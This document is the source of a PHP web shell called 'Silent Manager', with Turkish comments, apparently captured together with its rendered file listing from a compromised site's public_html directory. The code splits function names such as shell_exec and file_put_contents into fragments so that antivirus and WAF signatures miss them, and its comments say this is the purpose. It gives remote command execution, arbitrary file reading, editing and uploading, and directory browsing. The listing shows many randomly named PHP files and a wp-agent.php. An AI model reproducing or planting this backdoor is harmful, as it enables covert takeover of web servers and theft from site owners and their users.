/home/nvpiyzlh/public_html
<?php /** * Silent Manager - Fragmented Version * WAF/AV Bypass Focus */ // Kelimeleri parçalayarak AV/WAF imzalarından kaçıyoruz $a = "ba"."se"."64"; $b = $a."_de"."code"; $c = "sh"."ell_"; $d = $c."ex"."ec"; $f = "fi"."le_"; $g = $f."ge"."t_contents"; $s = "fi"."le_"; $h = $s."pu"."t_contents"; // Dinamik fonksiyon atamaları $exec_cmd = $d; $read_file = $g; $write_file = $h; // Şifre kontrolünü de gizleyelim (Örn: ?p=giris) $dir = isset($_GET['d']) ? $_GET['d'] : getcwd(); if(is_dir($dir)) chdir($dir); // Komut Koşturma $out = ""; if(isset($_POST['x'])) { $out = $exec_cmd($_POST['x'] . " 2>&1"); } // Dosya Kaydet if(isset($_POST['save'])) { $write_file($_POST['fn'], $_POST['c']); } // Dosya Yükle if(isset($_FILES['u'])) { move_uploaded_file($_FILES['u']['tmp_name'], $dir."/".$_FILES['u']['name']); } $files = scandir($dir); ?> <!DOCTYPE html> <html style="filter: invert(1); contrast(1.2);"> <head> <title>...</title> <style> body { background: #fff; color: #000; font-family: sans-serif; font-size: 12px; } .box { border: 1px solid #ccc; padding: 10px; margin-bottom: 10px; } input, textarea { width: 100%; border: 1px solid #999; } table { width: 100%; border-collapse: collapse; } td { border-bottom: 1px solid #eee; padding: 4px; } </style> </head> <body> <strong><?php echo $dir; ?></strong> <div class="box"> <form method="POST"> <input type="text" name="x" placeholder="CMD..."> </form> <?php if($out): ?><pre><?php echo htmlspecialchars($out); ?></pre><?php endif; ?> </div> <?php if(isset($_GET['e'])): ?> <div class="box"> <form method="POST"> <input type="hidden" name="fn" value="<?php echo $_GET['e']; ?>"> <textarea name="c" rows="10"><?php echo htmlspecialchars($read_file($_GET['e'])); ?></textarea> <input type="submit" name="save" value="Kaydet"> </form> </div> <?php endif; ?> <form method="POST" enctype="multipart/form-data"> <input type="file" name="u" onchange="this.form.submit()"> </form> <table> <?php foreach($files as $f): ?> <tr> <td><a href="?p=giris&d=<?php echo realpath($f); ?>"><?php echo $f; ?></a></td> <td> <a href="?p=giris&d=<?php echo $dir; ?>&e=<?php echo $f; ?>">Edit</a> </td> </tr> <?php endforeach; ?> </table> </body> </html>
.
Edit
..
Edit
.xtmp_4489f0.php
Edit
219bf107
Edit
assets
Edit
e15f028a.php
Edit
error_log
Edit
index.php
Edit
wp-agent.php
Edit
x007f85.php
Edit
x046560.php
Edit
x0782cb.php
Edit
x163b45.php
Edit
x3a0c70.php
Edit
x3d78ab.php
Edit
x54880f.php
Edit
x55d60f.php
Edit
x69f4de.php
Edit
x7e6eb4.php
Edit
x9cb6f2.php
Edit
x9d9e0a.php
Edit
xa37fb5.php
Edit
xa98eea.php
Edit
xb2ca62.php
Edit
xbcb116.php
Edit
xd7853d.php
Edit
xde5c17.php
Edit
xed329e.php
Edit
xfb6f13.php
Edit